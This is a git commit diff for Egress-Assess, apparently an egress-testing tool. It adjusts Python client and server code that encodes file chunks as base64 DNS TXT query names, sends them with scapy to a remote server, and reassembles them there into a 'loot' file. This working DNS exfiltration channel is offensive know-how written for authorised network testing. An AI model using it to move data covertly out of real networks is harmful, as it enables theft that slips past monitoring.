infosecn1nja
/
Egress-Assess
mirror of https://github.com/infosecn1nja/Egress-Assess.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

added check to make sure slide is or is not already in file dictionary

resolved_file
Christopher Truncer 2015-05-27 09:56:36 -04:00
parent 1cd4d30b99
commit 7b1638fd88
2 changed files with 32 additions and 30 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

37
protocols/clients/dns_resolved.py
View File

@ -20,28 +20,17 @@ class Client:
self.protocol = "dns_resolved"
self.remote_server = cli_object.ip
self.max_length = 68
self.current_total = 0
if cli_object.file is None:
self.file_transfer = False
self.length = 50
else:
self.length = 30
self.length = 24
if "/" in cli_object.file:
self.file_transfer = cli_object.file.split("/")[-1]
else:
self.file_transfer = cli_object.file
def dns_encode(outgoing_data):
# This function from http://bb.secdev.org/scapy/issue/500/les-r-ponses-dns-de-type-txt-sont-malform
for i in range(0, len(outgoing_data), 0xff+1):
outgoing_data = outgoing_data[:i] + chr(len(outgoing_data[i:i+0xff])) + outgoing_data[i:]
return outgoing_data
def randomKey(b=20):
"""
Returns a random string/key of "b" characters in length, defaults to 32
"""
return ''.join(random.choice(string.ascii_letters + string.digits) for x in range(b))
def transmit(self, data_to_transmit):
byte_reader = 0
@ -78,22 +67,34 @@ class Client:
encoded_data = base64.b64encode(str(packet_number) + ".:|:." + data_to_transmit[byte_reader:byte_reader + self.length])
encoded_data = encoded_data + "." + self.remote_server
# calcalate total packets
if (((len(data_to_transmit) - byte_reader) % self.length) == 0):
packet_diff = (len(data_to_transmit) - byte_reader) / self.length
else:
packet_diff = ((len(data_to_transmit) - byte_reader) / self.length)
while len(encoded_data) > self.max_length:
self.length -= 1
# calcalate total packets
if (((len(data_to_transmit) - byte_reader) % self.length) == 0):
packet_diff = (len(data_to_transmit) - byte_reader) / self.length
packet_diff2 = (len(data_to_transmit) - byte_reader) / self.length
else:
packet_diff = ((len(data_to_transmit) - byte_reader) / self.length)
packet_diff2 = ((len(data_to_transmit) - byte_reader) / self.length)
check_total = True
encoded_data = base64.b64encode(str(packet_number) + ".:|:." + data_to_transmit[byte_reader:byte_reader + self.length])
encoded_data = encoded_data + "." + self.remote_server
if check_total:
self.current_total = packet_number + packet_diff
self.current_total = packet_number + packet_diff2
check_total = False
else:
if self.current_total == 0:
self.current_total = packet_diff
else:
pass
print "[*] Packet Number/Total Packets: " + str(packet_number) + "/" + str(self.current_total)
# Craft the packet with scapy
@ -103,10 +104,10 @@ class Client:
if '=' in encoded_data:
encoded_data = encoded_data.replace('=', '-pqp-')
response_packet = sr1(IP(dst=nameserver)/UDP()/DNS(
response_packet = sr1(IP(dst=nameserver, ttl=10)/UDP()/DNS(
rd=1, id=15, opcode=0,
qd=[DNSQR(qname=encoded_data, qtype="TXT")], aa=1, qr=0),
verbose=False, timeout=2)
verbose=False, timeout=8)
if response_packet:
if response_packet.haslayer(DNSRR):

25
protocols/servers/dns_resolved.py
View File

@ -16,7 +16,6 @@ class Server:
def __init__(self, cli_object):
self.protocol = "dns_resolved"
self.last_packet = ''
self.file_name = ''
self.loot_path = ''
self.file_dict = {}
@ -42,24 +41,26 @@ class Server:
incoming_data = base64.b64decode(string_to_decode)
if ".:|:." in incoming_data:
self.file_status = incoming_data.split('.:|:.')[0]
file_data = incoming_data.split('.:|:.')[1]
self.file_dict[self.file_status] = file_data
if self.file_status in self.file_dict:
pass
else:
file_data = incoming_data.split('.:|:.')[1]
self.file_dict[self.file_status] = file_data
outgoing_data = self.file_status + "allgoodhere"
outgoing_data = self.file_status + "allgoodhere"
# This function from http://bb.secdev.org/scapy/issue/500/les-r-ponses-dns-de-type-txt-sont-malform
for i in range(0, len(outgoing_data), 0xff+1):
outgoing_data = outgoing_data[:i] + chr(len(outgoing_data[i:i+0xff])) + outgoing_data[i:]
# This function from http://bb.secdev.org/scapy/issue/500/les-r-ponses-dns-de-type-txt-sont-malform
for i in range(0, len(outgoing_data), 0xff+1):
outgoing_data = outgoing_data[:i] + chr(len(outgoing_data[i:i+0xff])) + outgoing_data[i:]
send(IP(dst=packet[IP].src)/UDP(dport=packet[UDP].sport, sport=53)/DNS(rd=1, id=packet[DNS].id, qr=1,
qd=[DNSQR(qname=dnsqr_strings.split('\'')[1].rstrip('.'), qtype=packet[DNSQR].qtype)],
an=[DNSRR(rrname=dnsqr_strings.split('\'')[1].rstrip('.'), rdata=outgoing_data, type=packet[DNSQR].qtype)]),
verbose=False)
send(IP(dst=packet[IP].src)/UDP(dport=packet[UDP].sport, sport=53)/DNS(rd=1, id=packet[DNS].id, qr=1,
qd=[DNSQR(qname=dnsqr_strings.split('\'')[1].rstrip('.'), qtype=packet[DNSQR].qtype)],
an=[DNSRR(rrname=dnsqr_strings.split('\'')[1].rstrip('.'), rdata=outgoing_data, type=packet[DNSQR].qtype)]),
verbose=False)
else:
with open(self.loot_path + self.file_name, 'a') as dns_out:
dns_out.write(encoded_data)
self.last_packet = encoded_data
except TypeError:
pass